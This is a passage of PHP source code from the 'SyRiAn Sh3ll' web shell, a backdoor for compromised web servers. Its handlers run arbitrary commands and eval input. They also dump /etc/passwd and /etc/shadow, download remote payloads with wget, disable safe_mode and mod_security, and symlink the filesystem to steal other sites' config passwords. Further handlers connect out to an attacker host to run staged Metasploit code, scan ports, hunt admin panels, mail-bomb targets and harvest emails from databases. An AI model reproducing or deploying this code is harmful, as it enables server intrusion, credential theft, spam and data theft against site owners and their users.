  905. # ---------------------------------------#
  906. # Some Info #
  907. #----------------------------------------#
  908. $dir = getcwd();
  909. $uname= @php_uname();
  910. if(strlen($dir)>1 && $dir[1]==":")
  911. $os = "Windows";
  912. else $os = "Linux";
  913. $serverIP = gethostbyname($_SERVER["HTTP_HOST"]);
  914. $server = @substr($SERVER_SOFTWARE,0,120);
  915.  
  916. echo "
  917. <body dir=\"ltr\"><table bgcolor=#cccccc cellpadding=0 cellspacing=0 width=\"100%\"><tbody><tr><td bgcolor=#000000 width=160>
  918. <p dir=ltr>&nbsp;&nbsp;</p>
  919. <div dir=ltr align=center><font size=4><b>
  920. <img border=0 src=http://www.library-ar.com/cache/eagle.jpg width=101 height=93>&nbsp;</b></font><div
  921. dir=ltr align=center><span style=height: 25px;><b>
  922. <font size=4 color=#FF0000>SyRi</font><font size=4 color=#008000>An Sh</font><font size=4 color=#999999>3ll<br>V7</font></b><span style=font-size: 20pt; color:
  923.  
  924. #990000><p></p></span></span></div></td><td
  925. bgcolor=#000000>
  926. <p dir=ltr><font size=1>&nbsp; <b>[<a href=?id=mainPage>Main</a>]</b></span>
  927. <font color=black></span></font><b>[</span><a href=?id=scriptsHack>Forum Defacer</a>]</b></span>
  928. <b>[</span><a href=?id=spamming>Email Spammer</a>]</b></span>
  929. <b>[</span><a href=?id=about>About</a>]</b></span>
  930. <b>[</span><a href=?id=logout>Logout</a>]</b></span>
  931. <b>[</span><a href=?id=100>SuiCide</a>]</b></span>
  932. <br>
  933. <font size=1><br>
  934. &nbsp; Safe Mode = <sy>".@SafeMode()." </sy><font size=1>
  935. &nbsp; System = <sy>".$os."</sy>
  936. &nbsp; Magic_Quotes = <sy>". @magicQouts()." </sy>
  937. &nbsp; Curl = <sy>".@Curl()." </sy>
  938. &nbsp; Register Globals = <sy>".@RegisterGlobals()." </sy>
  939. &nbsp; Open Basedir = <sy>".@openBaseDir()." </sy>
  940. <br>
  941. &nbsp; Gzip = <sy>".@Gzip()."</sy>
  942. &nbsp; MySQLI = <sy>".@MysqlI()." </sy>
  943. &nbsp; MSQL = <sy>".@MSQL()."</sy>
  944. &nbsp; SQL Lite = <sy>".@SQlLite()."</sy>
  945. &nbsp; Usefull Locals = <sy>".rootxpL()." </sy>
  946. <br>
  947. &nbsp; Free Space = <sy>".@HardSize(disk_free_space('/'))." </sy>
  948. &nbsp; Total Space = <sy>".@HardSize(disk_total_space("/"))." </sy>
  949. &nbsp; PHP Version = <sy>".@phpversion()." </sy>
  950. &nbsp; Zend Version = <sy>".@zend_version()." </sy>
  951. &nbsp; MySQL Version = <sy>".@mysql_get_server_info()." </sy>
  952. <br>
  953. &nbsp; MySQL = ".MySQL2()."
  954. &nbsp; MsSQL = ".MsSQL()."
  955. &nbsp; PostgreSQL = ".PostgreSQL()."
  956. &nbsp; Oracle = ".Oracle()."
  957. &nbsp; Server Name = <sy>".$_SERVER['HTTP_HOST']." </sy>
  958. &nbsp; Server Admin = <sy>".$_SERVER['SERVER_ADMIN']." </sy>
  959. <br>
  960. &nbsp; Dis_Functions = <sy>". DisableFunctions()." </sy><br>
  961. &nbsp; Your IP = <sy>".GetRealIP()." </sy>
  962. &nbsp; Server IP = <sy><a href='http://bing.com/search?q=ip:".$serverIP."&go=&form=QBLH&filt=all' target=\"_blank\">".gethostbyname($_SERVER["HTTP_HOST"])."
  963.  
  964. </sy></a>
  965. [</span><a href=http://www.yougetsignal.com/tools/web-sites-on-web-server target=\"_blank\"/>Reverse IP</a>]</span>
  966. &nbsp; Date Time = <sy>".date('Y-m-d H:i:s')." </sy><br/>
  967. &nbsp;
  968. [<a href='http://www.md5decrypter.co.uk/' target='_blank'>MD5 Cracker</a>]
  969. [<a href='http://www.md5decrypter.co.uk/sha1-decrypt.aspx' target='_blank'>SHA1 Cracker</a>]
  970. [<a href='http://www.md5decrypter.co.uk/ntlm-decrypt.aspx' target='_blank'>NTLM Cracker</a>]
  971. <br>
  972. <br>
  973. <table bgcolor=#cccccc width=\"100%\"><tbody><tr>
  974. <td align=right width=100><p dir=ltr>
  975. <sy>&nbsp;&nbsp;Server :&nbsp;&nbsp; <br>
  976. <b>uname -a : &nbsp;
  977. <br>pwd : </span>&nbsp;<br>ID : </span>&nbsp;<br></b></sy></td><td>
  978. <p dir=ltr><font color=#cccccc size=-2><b> &nbsp;&nbsp;".$server."
  979. <br>&nbsp;&nbsp;".$uname." <sy><a href=http://www.google.com/search?q=".urlencode(@php_uname())." target=_blank>[Google]</a></sy><br>&nbsp;&nbsp;".
  980.  
  981. $dir."<br>&nbsp;&nbsp;".Exe('id')."</b>
  982. </font></td></tr></tbody>
  983. </table>
  984. &nbsp;&nbsp;[<a href='#down'>Down</a>]
  985. [<a href='javascript:window.print()'>Print</a>]
  986. </table>";
  987.  
  988. # ---------------------------------------#
  989. # Main Page #
  990. #----------------------------------------#
  991. if ($_GET['id']== 'mainPage')
  992. {
  993. echo "<form method='post'><table width=100% border=1><tr><td>
  994. <textarea name='ExecutionArea' rows=10 cols=152 style='color=red'>";
  995.  
  996. if(!$_POST || $_POST['login']) // Show Current Directory Contents if No Post in requesting ...
  997. {
  998. @chdir($_POST['directory']);
  999. if($os == "Windows")
  1000. {
  1001. echo Exe('dir');
  1002. }
  1003. else if($os == "Linux")
  1004. {
  1005. echo Exe('ls');
  1006. }
  1007. }
  1008. else if($_POST['submitCommands']) // Execute The Alias Command .
  1009. {
  1010. echo Exe($_POST['alias']);
  1011. }
  1012. else if($_POST['Execute']) // Execute The Command From Command Line .
  1013. {
  1014. @chdir($_POST['directory']);
  1015. if(empty($_POST['cmd']))
  1016. {
  1017. if($os == "Windows")
  1018. {
  1019. echo Exe('dir');
  1020. }
  1021. else if($os == "Linux")
  1022. {
  1023. echo Exe('ls -lia');
  1024. }
  1025. }
  1026. else
  1027. {
  1028. echo Exe($_POST['cmd']);
  1029. }
  1030. }
  1031. else if($_POST['submitEval']) // Execute Eval Code .
  1032. {
  1033. $eval = @str_replace("<?php","",$_POST['php_eval']);
  1034. $eval = @str_replace("<?php","",$eval);
  1035. $eval = @str_replace("?>","",$eval);
  1036. $eval = @str_replace("\\","",$eval);
  1037. echo eval($eval);
  1038. }
  1039. # --------------------------
  1040. # Hash Analyzer
  1041. #---------------------------
  1042. else if($_POST['analyzieNow'])
  1043. {
  1044. $hash = $_POST['hashToAnalyze'];
  1045. $subHash = substr($hash,0,3);
  1046. if($subHash =='$ap' && strlen($hash) == 37)
  1047. {
  1048. echo "The Hash : ".$hash." is : MD5(APR) Hash";
  1049. }
  1050. else if($subHash =='$1$' && strlen($hash) == 34)
  1051. {
  1052. echo "The Hash : ".$hash." is : MD5(UNIX) Hash";
  1053. }
  1054. else if($subHash =='$H$' && strlen($hash) == 35)
  1055. {
  1056. echo "The Hash : ".$hash." is : MD5(phpBB3) Hash";
  1057. }
  1058. else if(strlen($hash) == 29)
  1059. {
  1060. echo "The Hash : ".$hash." is : MD5(Wordpress) Hash";
  1061. }
  1062. else if($subHash =='$5$' && strlen($hash) == 64)
  1063. {
  1064. echo "The Hash : ".$hash." is : SHA256(UNIX) Hash";
  1065. }
  1066. else if($subHash =='$6$' && strlen($hash) == 128)
  1067. {
  1068. echo "The Hash : ".$hash." is : SHA512(UNIX) Hash";
  1069. }
  1070. else if(strlen($hash) == 56)
  1071. {
  1072. echo "The Hash : ".$hash." is : SHA224 Hash";
  1073. }
  1074. else if(strlen($hash) == 64)
  1075. {
  1076. echo "The Hash : ".$hash." is : SHA256 Hash";
  1077. }
  1078. else if(strlen($hash) == 96)
  1079. {
  1080. echo "The Hash : ".$hash." is : SHA384 Hash";
  1081. }
  1082. else if(strlen($hash) == 128)
  1083. {
  1084. echo "The Hash : ".$hash." is : SHA512 Hash";
  1085. }
  1086. else if(strlen($hash) == 40)
  1087. {
  1088. echo "The Hash : ".$hash." is : MySQL v5.x Hash";
  1089. }
  1090. else if(strlen($hash) == 16)
  1091. {
  1092. echo "The Hash : ".$hash." is : MySQL Hash";
  1093. }
  1094. else if(strlen($hash) == 13)
  1095. {
  1096. echo "The Hash : ".$hash." is : DES(Unix) Hash";
  1097. }
  1098. else if(strlen($hash) == 32)
  1099. {
  1100. echo "The Hash : ".$hash." is : MD5 Hash";
  1101. }
  1102. else if(strlen($hash) == 4)
  1103. {
  1104. echo "The Hash : ".$hash." is : [CRC-16]-[CRC-16-CCITT]-[FCS-16]";}
  1105. else
  1106. {
  1107. echo "Error : Can't Detect Hash Type";
  1108. }
  1109. }
  1110. # --------------------------
  1111. # Show Users
  1112. #---------------------------
  1113. else if($_POST['showUsers'])
  1114. {
  1115. function showUsers()
  1116. {
  1117.  
  1118. if($rows = Exe('cat /etc/passwd'))
  1119. {
  1120. echo $rows;
  1121. }
  1122. elseif($rows= Exe('cat /etc/domainalias'))
  1123. {
  1124. echo $rows;
  1125. }
  1126. elseif($rows= Exe('cat /etc/shadow'))
  1127. {
  1128. echo $rows;
  1129. }
  1130. elseif($rows= Exe('cat /var/mail'))
  1131. {
  1132. echo $rows;
  1133. }
  1134. elseif($rows= Exe('cat /etc/valiases'))
  1135. {
  1136. echo $rows;
  1137. }
  1138. else { echo "[-] Can't Show Users :( ... Sorry ";}
  1139. }
  1140. showUsers();
  1141. }
  1142. # --------------------------
  1143. # Generate perl
  1144. #---------------------------
  1145. else if($_POST['generatePel'])
  1146. {
  1147. @chdir($_POST["cgiperlPath"]);
  1148. @mkdir("cgi", 0755);
  1149. @chdir("cgi");
  1150. Exe('wget http://www.syrian-shell.com/cgiPerl/cgiPerl.sy3.zip');
  1151. Exe('unzip cgiPerl.sy3.zip');
  1152. @unlink('cgiPerl.sy3.zip');
  1153. @chmod("cgiPerl.sy3",0755);
  1154. @chmod("compiler",0777);
  1155. $cgi_h = fopen('.htaccess','w+');
  1156. @fwrite($cgi_h,'AddHandler cgi-script .sy3');
  1157. echo '
  1158. cgi.sy3 & .htaccess Has Been Created in [ cgi ] Directory
  1159. Password Is : sy34' ;
  1160. }
  1161. # --------------------------
  1162. # Generate Server
  1163. #---------------------------
  1164. else if($_POST['generateSER'])
  1165. {
  1166. @chdir($_POST['ShourtCutPath']);
  1167. @mkdir("allserver", 0755);
  1168. @chdir("allserver");
  1169. Exe("ln -s / allserver");
  1170. GenerateFile(".htaccess","
  1171. Options Indexes FollowSymLinks
  1172. DirectoryIndex ssssss.htm
  1173. AddType txt .php
  1174. AddHandler txt .php");
  1175. echo 'Now Go to allserver folder '.$_POST['ShourtCutPath'].'' ;
  1176. }
  1177. # --------------------------
  1178. # Change Mode
  1179. #---------------------------
  1180. else if($_POST['changePermission'])
  1181. {
  1182. $ch_ok = @chmod($_POST['fileName'],$_POST['per']);
  1183. if($ch_ok)
  1184. echo "Permission Changed Successfully ! " ;
  1185. else echo "Changing Is Not Allowed Or The File is not Exist !";
  1186. }
  1187. # --------------------------
  1188. # Generate Users
  1189. #---------------------------
  1190. else if($_POST['GenerateUsers'])
  1191. {
  1192. @chdir($_POST['usersPath']);
  1193. @mkdir("users", 0755);
  1194. @chdir('users');
  1195. Exe('wget http://www.syrian-shell.com/usersAndDomains/users.rar');
  1196. Exe('mv users.rar users.sy3');
  1197. @chmod('users.sy3',0755 );
  1198. $user_h = fopen('.htaccess','w+');
  1199. fwrite($user_h,'AddHandler cgi-script .sy3');
  1200. echo "users.sy3 & .htaccess Has Been Created in [ users ] Directory" ;
  1201. }
  1202. # --------------------------
  1203. # Forbidden
  1204. #---------------------------
  1205. else if($_POST['generateForbidden'])
  1206. {
  1207. @chdir($_POST['forbiddenPath']);
  1208. @mkdir('forbidden');
  1209. @chdir('forbidden');
  1210. $htaccess = fopen('.htaccess','w+');
  1211. if($_POST['403'] == 'DirectoryIndex')
  1212. {
  1213. fwrite($htaccess,"DirectoryIndex in.txt");
  1214. }
  1215. elseif($_POST['403'] == 'HeaderName')
  1216. {
  1217. fwrite($htaccess,"HeaderName in.txt");
  1218. }
  1219. elseif($_POST['403'] == 'TXT')
  1220. {
  1221. fwrite($htaccess,"
  1222. Options Indexes FollowSymLinks
  1223. addType txt .php
  1224. AddHandler txt .php");
  1225. }
  1226. elseif($_POST['403'] == '404')
  1227. {
  1228. fwrite($htaccess,"
  1229. ErrorDocument 404 /404.html
  1230. 404.html = Symlinked in.txt ");
  1231. }
  1232. elseif($_POST['403'] == 'ReadmeName')
  1233. {
  1234. fwrite($htaccess,"ReadmeName in.txt");
  1235. }
  1236. elseif($_POST['403'] == 'footerName')
  1237. {
  1238. fwrite($htaccess,"footerName in.txt");
  1239. }
  1240. echo "
  1241. Now Go To [ forbidden ] Dir And Then make The Shortcut [ in.txt ]
  1242. EX : ln -s /home/user/public_html/config.php in.txt";
  1243. }
  1244. # --------------------------
  1245. # Upload Files
  1246. #---------------------------
  1247. else if($_POST['UploadNow'])
  1248. {
  1249. $nbr_uploaded =0;
  1250. $files_uploded = array();
  1251. $path= '';
  1252. $target_path= $path . basename($_FILES['uploadfile']['name'][$i]);
  1253. for ($i = 0; $i < count($_FILES['uploadfile']['name']); $i++)
  1254. {
  1255. if($_FILES['uploadfile']['name'][$i] != '')
  1256. {
  1257. move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $target_path . $_FILES['uploadfile']['name'][$i]);
  1258. $files_uploded[] = $_FILES['uploadfile']['name'][$i];
  1259. $nbr_uploaded++;
  1260. echo "The File ".basename($_FILES['uploadfile']['name'][$i])." Uploaded Successfully !
  1261. ";
  1262. }
  1263. else "The File ".basename($_FILES['uploadfile']['name'][$i])." Can't Be Upload :( !";
  1264. }
  1265. }
  1266. # --------------------------
  1267. # no Security
  1268. #---------------------------
  1269. else if($_POST['phpiniGenerate'])
  1270. {
  1271. GenerateFile("php.ini","
  1272. safe_mode = Off
  1273. disable_functions = NONE
  1274. safe_mode_gid = OFF
  1275. open_basedir = OFF");
  1276. echo "php.ini Has Been Generated Successfully";
  1277. }
  1278. else if($_POST['htaccessGenerate'])
  1279. {
  1280. GenerateFile(".htaccess","
  1281. <IfModule mod_security.c>
  1282. SecFilterEngine Off
  1283. SecFilterScanPOST Off
  1284. SecFilterCheckURLEncoding Off
  1285. SecFilterCheckCookieFormat Off
  1286. SecFilterCheckUnicodeEncoding Off
  1287. SecFilterNormalizeCookies Off
  1288. </IfModule>
  1289. SetEnv PHPRC ".getcwd()."php.ini
  1290. suPHP_ConfigPath ".getcwd()."php.ini
  1291. ");
  1292. echo ".htaccess Has Been Generated Successfully ";
  1293. }
  1294. else if($_POST['iniphpGenerate'])
  1295. {
  1296. GenerateFile("ini.php","
  1297. ini_restore(\"safe_mode\");
  1298. ini_restore(\"open_basedir\");
  1299. ");
  1300. echo "ini.php Has Been Generated Successfully";
  1301. }
  1302. # --------------------------
  1303. # Reading Files
  1304. #---------------------------
  1305. else if($_POST['read'] || $_POST['show'])
  1306. {
  1307. $file = $_POST['file'];
  1308. $file = str_replace('\\\\','\\',$file);
  1309.  
  1310. if($_POST['read'])
  1311. {
  1312. $openMyFile = fopen($file,'r');
  1313. if(function_exists('fread'))
  1314. {
  1315. echo fread($openMyFile,100000);
  1316. }
  1317. elseif(function_exists('fgets'))
  1318. {
  1319. echo fgets($openMyFile);
  1320. }
  1321. elseif(function_exists('readfile'))
  1322. {
  1323. echo readfile($openMyFile);
  1324. }
  1325. elseif(function_exists('file_get_contents'))
  1326. {
  1327. $readMyFile = @file_get_contents($file, NULL, NULL, 0, 1000000);
  1328. var_dump($readMyFile);
  1329. }
  1330. elseif(function_exists('file'))
  1331. {
  1332. $readMyFile = file($myFile);
  1333. foreach ($readMyFile as $line_num => $readMyFileLine)
  1334. {
  1335. echo "Line #$line_num : " . $readMyFileLine . "
  1336. ";
  1337. }
  1338. }
  1339. elseif(Exe("'cat ".$file."'"))
  1340. {
  1341. echo Exe("'cat ".$file."'");
  1342. }
  1343. elseif(function_exists('readfile'))
  1344. {
  1345. readfile($file);
  1346. }
  1347. elseif(function_exists('include'))
  1348. {
  1349. include($file);
  1350. }
  1351. elseif(function_exists('copy'))
  1352. {
  1353. $tmp=tempnam('','cx');
  1354. copy('compress.zlib://'.$file,$tmp);
  1355. $fh=fopen($tmp,'r');
  1356. $data=fread($fh,filesize($tmp));
  1357. fclose($fh);
  1358. echo $data;
  1359. }
  1360. elseif(function_exists('mb_send_mail'))
  1361. {
  1362. if(file_exists('/tmp/mb_send_mail'))
  1363. {
  1364. unlink('/tmp/mb_send_mail');
  1365. }
  1366. @mb_send_mail(NULL, NULL, NULL, NULL,'-C $file -X /tmp/mb_send_mail');
  1367. @readfile('/tmp/mb_send_mail');
  1368. }
  1369. else if(function_exists('curl_init'))
  1370. {
  1371. $fh=curl_init('file://'.$file.'');
  1372. $tmp=curl_exec($fh);
  1373. echo $tmp;
  1374. if(strstr($file,DIRECTORY_SEPARATOR))
  1375. $ch=curl_init('file:///'.$file."\x00/../../../../../../../../../../../../".__FILE__);
  1376. else $ch=curl_init('file://'.$file."\x00".__FILE__);
  1377. var_dump(curl_exec($ch));
  1378. }
  1379. else if(is_writable('.'))
  1380. {
  1381. file_put_contents('php.ini','safe_mode = Off');
  1382. readfile($file);
  1383. unlink('php.ini');
  1384. }
  1385. else if(is_object($ws=new COM('WScript.Shell')))
  1386. {
  1387. echo $exec=comshelL("type \"$file\"",$ws);
  1388. }
  1389. else if(checkfunctioN('win_shell_execute'))
  1390. {
  1391. echo winshelL("type \"$file\"");
  1392. }
  1393. else if(checkfunctioN('win32_create_service'))
  1394. {
  1395. echo srvshelL("type \"$file\"");
  1396. }
  1397. else if(function_exists('imap_open'))
  1398. {
  1399. $str=imap_open('/etc/passwd','','');
  1400. $list=imap_list($str,$file,'*');
  1401. for($i=0;$i<count($list);$i++)
  1402. {
  1403. echo $list[$i]."\n";
  1404. }
  1405. imap_close($str);
  1406. $str=imap_open($file,'','');
  1407. $tmp=imap_body($str,1);
  1408. echo $tmp;
  1409. imap_close($str);
  1410. }
  1411. elseif($file == '/etc/passwd')
  1412. {
  1413. for($uid=0;$uid<99999;$uid++)
  1414. {
  1415. $h=posix_getpwuid($uid);
  1416. if(!empty($h))
  1417. foreach($h as $v)
  1418. echo "$v:";
  1419. echo "\r\n";
  1420. }
  1421. }
  1422. fclose($openMyFile);
  1423. }
  1424. elseif($_POST['show'])
  1425. {
  1426. $con=glob("$file*");
  1427. foreach ($con as $v)
  1428. {
  1429. echo "$v\n";
  1430. }
  1431. if(function_exists('imap_open'))
  1432. {
  1433. $str=imap_open('/etc/passwd','','');
  1434. $s=explode("|",$file);
  1435. if(count($s)>1)
  1436. {
  1437. $list=imap_list($str,trim($s[0]),trim($s[1]));
  1438. }
  1439. else
  1440. {
  1441. $list=imap_list($str,trim($str[0]),'*');
  1442. }
  1443. for($i=0;$i<count($list);$i++)
  1444. {
  1445. imap_close($str);
  1446. }
  1447. }
  1448. else if(is_object($ws=new COM('WScript.Shell')))
  1449. {
  1450. $exec=comshelL("dir \"$file\"",$ws);
  1451. $exec=str_replace("\t",'',$exec);
  1452. echo $exec;
  1453. }
  1454. else if(checkfunctioN('win_shell_execute'))
  1455. {
  1456. echo winshelL("dir \"$file\"");
  1457. }
  1458. else if(checkfunctioN('win32_create_service'))
  1459. {
  1460. echo srvshelL("dir \"$file\"");
  1461. }
  1462. }
  1463.  
  1464. }
  1465. # --------------------------
  1466. # Encryption
  1467. #---------------------------
  1468. elseif($_POST['encryptNow'])
  1469. {
  1470. if(!empty($_POST['ENCRYPTION']))
  1471. {
  1472. $md5 = $_POST['ENCRYPTION'];
  1473. echo "
  1474. MD5 : ".md5($md5)."
  1475. Base64 Encode : ".base64_encode($md5)."
  1476. Base64 Decode : ".base64_decode($md5)."
  1477. Crypt : ".crypt($md5)."
  1478. SHA1 : ".sha1($md5)."
  1479. MD4 : ".hash("md4",$md5)."
  1480. SHA256 : ".hash("sha256",$md5)."
  1481. URL Encoding : ".urlencode($md5)."
  1482. URL Decoding : ".str_hex($md5)."
  1483. CRC32 : ".crc32($md5)."
  1484. Length : ".strlen($md5)."";
  1485. }
  1486. else
  1487. {
  1488. echo "Please Put At Least One Char !";
  1489. }
  1490. }
  1491. # --------------------------
  1492. # Metasploit RC
  1493. #---------------------------
  1494. else if($_POST['metaConnect'])
  1495. {
  1496. $ip = $_POST['ip'];
  1497. $port = $_POST['port'];
  1498. if ($ip == "" && $port == "")
  1499. {
  1500. echo "Please fill IP Adress & The listen Port";
  1501. }
  1502. else
  1503. {
  1504. $ipaddr = $ip;
  1505. $port = $port;
  1506. if (FALSE !== strpos($ipaddr, ":"))
  1507. {
  1508. $ipaddr = "[". $ipaddr ."]";
  1509. }
  1510. if (is_callable('stream_socket_client'))
  1511. {
  1512. $msgsock = @stream_socket_client("tcp://{$ipaddr}:{$port}");
  1513. if (!$msgsock)
  1514. {
  1515. die();
  1516. }
  1517. $msgsock_type = 'stream';
  1518. }
  1519. elseif (is_callable('fsockopen'))
  1520. {
  1521. $msgsock = fsockopen($ipaddr,$port);
  1522. if (!$msgsock)
  1523. {
  1524. die();
  1525. }
  1526. $msgsock_type = 'stream';
  1527. }
  1528. elseif (is_callable('socket_create'))
  1529. {
  1530. $msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  1531. $res = socket_connect($msgsock, $ipaddr, $port);
  1532. if (!$res)
  1533. {
  1534. die();
  1535. }
  1536. $msgsock_type = 'socket';
  1537. }
  1538. else
  1539. {
  1540. die();
  1541. }
  1542. switch ($msgsock_type)
  1543. {
  1544. case 'stream': $len = fread($msgsock, 4); break;
  1545. case 'socket': $len = socket_read($msgsock, 4); break;
  1546. }
  1547. if (!$len)
  1548. {
  1549. die();
  1550. }
  1551. $a = unpack("Nlen", $len);
  1552. $len = $a['len'];
  1553. $buffer = '';
  1554. while (strlen($buffer) < $len)
  1555. {
  1556. switch ($msgsock_type)
  1557. {
  1558. case 'stream': $buffer .= fread($msgsock, $len-strlen($buffer));
  1559. break;
  1560. case 'socket': $buffer .= socket_read($msgsock, $len-strlen($buffer));
  1561. break;
  1562. }
  1563. }
  1564. eval($buffer);
  1565. echo "[*] Connection Terminated";
  1566. die();
  1567. }
  1568. }
  1569. # --------------------------
  1570. # Scan Ports
  1571. #---------------------------
  1572. else if($_POST['submitDomainToScanPort'])
  1573. {
  1574. $domainToScan = $_POST['domainToScanPort'];
  1575. if(!$domainToScan)
  1576. {
  1577. echo "[-] Enter IP Address Or Domain To Scan";
  1578. }
  1579. else
  1580. {
  1581. for($i=0;$i<1024;$i++)
  1582. {
  1583. $fp = @fsockopen($domainToScan,$i,$errno,$errstr,10);
  1584. if($fp)
  1585. {
  1586. echo "[+] port " . $i . " open on " . $domainToScan . "
  1587. ";
  1588. }
  1589. else
  1590. {
  1591. echo "[+] port " . $i . " closed on " . $domainToScan . "
  1592. ";
  1593. }
  1594. flush();
  1595. }
  1596. fclose($fp);
  1597. }
  1598. }
  1599.  
  1600. if (isset($_POST["submit_lol"]))
  1601. {
  1602. set_time_limit(0);
  1603. $url = $_POST['hash_lol'];
  1604. echo "Testing ".$url."\n";
  1605. $extention = $_POST['extention'];
  1606. $adminlocales = array(
  1607. "admin/",
  1608. "wp-admin/",
  1609. "administration/",
  1610. "administrator/",
  1611. "moderator/",
  1612. "webadmin/",
  1613. "adminarea/",
  1614. "bb-admin/",
  1615. "adminLogin/",
  1616. "admin_area/",
  1617. "panel-administracion/",
  1618. "instadmin/",
  1619. "memberadmin/",
  1620. "administratorlogin/",
  1621. "adm/",
  1622. "siteadmin/login".$extention."",
  1623. "admin/account".$extention."",
  1624. "admin/index".$extention."",
  1625. "admin/login".$extention."",
  1626. "admin/admin".$extention."",
  1627. "admin_area/login".$extention."",
  1628. "admin_area/index".$extention."",
  1629. "admincp/index".$extention."",
  1630. "adminpanel".$extention."",
  1631. "webadmin".$extention."",
  1632. "webadmin/index".$extention."",
  1633. "webadmin/login".$extention."",
  1634. "admin/admin_login".$extention."",
  1635. "admin_login".$extention."",
  1636. "panel-administracion/login".$extention."",
  1637. "admin_area/admin".$extention."",
  1638. "bb-admin/index".$extention."",
  1639. "bb-admin/login".$extention."",
  1640. "bb-admin/admin".$extention."",
  1641. "admin/home".$extention."",
  1642. "pages/admin/admin-login".$extention."",
  1643. "admin/admin-login".$extention."",
  1644. "admin-login".$extention."",
  1645. "admin/adminLogin".$extention."",
  1646. "home".$extention."",
  1647. "adminarea/index".$extention."",
  1648. "admin/controlpanel".$extention."",
  1649. "admin".$extention."",
  1650. "admin/cp".$extention."",
  1651. "cp".$extention."",
  1652. "adminpanel.php",
  1653. "moderator".$extention."",
  1654. "administrator/index".$extention."",
  1655. "administrator/login".$extention."",
  1656. "user".$extention."",
  1657. "administrator/account".$extention."",
  1658. "administrator".$extention."",
  1659. "login".$extention."",
  1660. "modelsearch/login".$extention."",
  1661. "moderator/login".$extention."",
  1662. "panel-administracion/admin".$extention."",
  1663. "admincontrol/login".$extention."",
  1664. "adm/index".$extention."",
  1665. "moderator/admin".$extention."",
  1666. "account".$extention."",
  1667. "controlpanel".$extention."",
  1668. "admincontrol".$extention."",
  1669. "webadmin/admin".$extention."",
  1670. "adminLogin".$extention."",
  1671. "panel-administracion/login".$extention."",
  1672. "wp-login".$extention."",
  1673. "adminLogin".$extention."",
  1674. "admin/adminLogin".$extention."",
  1675. "adminarea/index".$extention."",
  1676. "adminarea/admin".$extention."",
  1677. "adminarea/login".$extention."",
  1678. "panel-administracion/index".$extention."",
  1679. "modelsearch/index".$extention."",
  1680. "modelsearch/admin".$extention."",
  1681. "adm/admloginuser".$extention."",
  1682. "admloginuser".$extention."",
  1683. "admin2".$extention."",
  1684. "admin2/login".$extention."",
  1685. "admin2/index".$extention."",
  1686. "adm/index".$extention."",
  1687. "adm".$extention."",
  1688. "affiliate".$extention."",
  1689. "adm_auth".$extention."",
  1690. "memberadmin".$extention."",
  1691. "administratorlogin".$extention."");
  1692. foreach ($adminlocales as $admin)
  1693. {
  1694. $headers = @get_headers("$url$admin");
  1695. if (@eregi('200', $headers[0]))
  1696. {
  1697. echo "[+] $url$admin ~ Found!\n";
  1698. }
  1699.  
  1700. }
  1701. }
  1702. # --------------------------
  1703. # Config Finder
  1704. #---------------------------
  1705. else if($_POST['configFinderSubmit'])
  1706. {
  1707. set_time_limit(0);
  1708. $passwd=fopen('/etc/passwd','r');
  1709. if (!$passwd)
  1710. {
  1711. echo "[-] Error : coudn't read /etc/passwd";
  1712. exit;
  1713. }
  1714. $path_to_public=array();
  1715. $users=array();
  1716. $pathtoconf=array();
  1717. $i=0;
  1718. while(!feof($passwd))
  1719. {
  1720. $str=fgets($passwd);
  1721. if ($i>35)
  1722. {
  1723. $pos=strpos($str,":");
  1724. $username=substr($str,0,$pos);
  1725. $dirz="/home/$username/public_html/";
  1726. if (($username!=""))
  1727. {
  1728. if (is_readable($dirz))
  1729. {
  1730. array_push($users,$username);
  1731. array_push($path_to_public,$dirz);
  1732. }
  1733. }
  1734. }
  1735. $i++;
  1736. }
  1737. echo "";
  1738. echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd
  1739. ";
  1740. echo "[+] Founded ".sizeof($path_to_public)." readable public_html directories
  1741. ";
  1742. echo "[~] Searching for passwords in config.* files...
  1743. ";
  1744. foreach ($users as $user)
  1745. {
  1746. $path="/home/$user/public_html/";
  1747. read_dir($path,$user);
  1748. }
  1749. echo "[+] Done";
  1750. }
  1751. # --------------------------
  1752. # Mail Storm
  1753. #---------------------------
  1754. else if($_POST['sendMailStorm'])
  1755. {
  1756. $to=$_POST['to'];
  1757. $nom=$_POST['nom'];
  1758. $Comments=$_POST['Comments'];
  1759. if ($to <> "" )
  1760. {
  1761. for ($i = 0; $i < $nom ; $i++)
  1762. {
  1763. $from = rand (71,1020000000)."@"."Attacker.com";
  1764. $subject= md5("$from");
  1765. if(@mail($to,$subject,$Comments,"From:$from"))
  1766. echo "[+] $i spammed !!
  1767. ";
  1768. else
  1769. {
  1770. echo "[-] $i Failed !!
  1771. ";
  1772. }
  1773. }
  1774. }
  1775. }
  1776. # --------------------------
  1777. # Extract Emails
  1778. #---------------------------
  1779. else if($_POST['getEmails'])
  1780. {
  1781. $emhost = $_POST['EM_HOST'];
  1782. $emuser = $_POST['EM_USER'];
  1783. $empass = $_POST['EM_PASS'];
  1784. $emdb = $_POST['EM_DB'];
  1785. $emtab = $_POST['EM_TABLE'];
  1786. $emcol = $_POST['EM_COLUMN'];
  1787. $try2Connect = @mysql_connect($emhost,$emuser,$empass);
  1788. if(!$try2Connect)
  1789. {
  1790. echo "[-] Can't Connect To DB !! [ user name || password is wrong ! ] .
  1791. ";
  1792. }
  1793. $try2Select = @mysql_select_db($emdb);
  1794. if(!$try2Select && $try2Connect)
  1795. {
  1796. echo "[-] DB Name is Wrong !! . ";
  1797. }
  1798. $sql = @mysql_query("SELECT * FROM $emtab");
  1799. while ($res = @mysql_fetch_array($sql))
  1800. {
  1801. echo ''.$res["$emcol"].'
  1802. ';
  1803. }
  1804. }
  1805. // Help
  1806. else if($_POST['emailExtractorHelp'])
  1807. {
  1808. echo "This is Some Tables Name & Columns Name For Some Fam Scripts ..
  1809.  
  1810. [+] VBulletin
  1811. Table-name : user
  1812. column-name : email
  1813.  
  1814. [+] WordPress
  1815. Table-name : wp_users
  1816. column-name : user_email
  1817.  
  1818. [+] Joomla
  1819. Table-name : jos_users
  1820. column-name : email
  1821.  
  1822. [+] PHPBB
  1823. Table-name : phpbb_users
  1824. column-name : user_email
  1825.  
  1826. [+] I.P.Board
  1827. Table-name : ibf_members
  1828. column-name : email
  1829.  
  1830. [+] SMF
  1831. Table-name : smf_members
  1832. column-name : emailAddress ";
  1833. }
  1834. # --------------------------
  1835. # MySQL Query
  1836. #---------------------------
  1837. else if($_POST['MySQLQuery'])
  1838. {
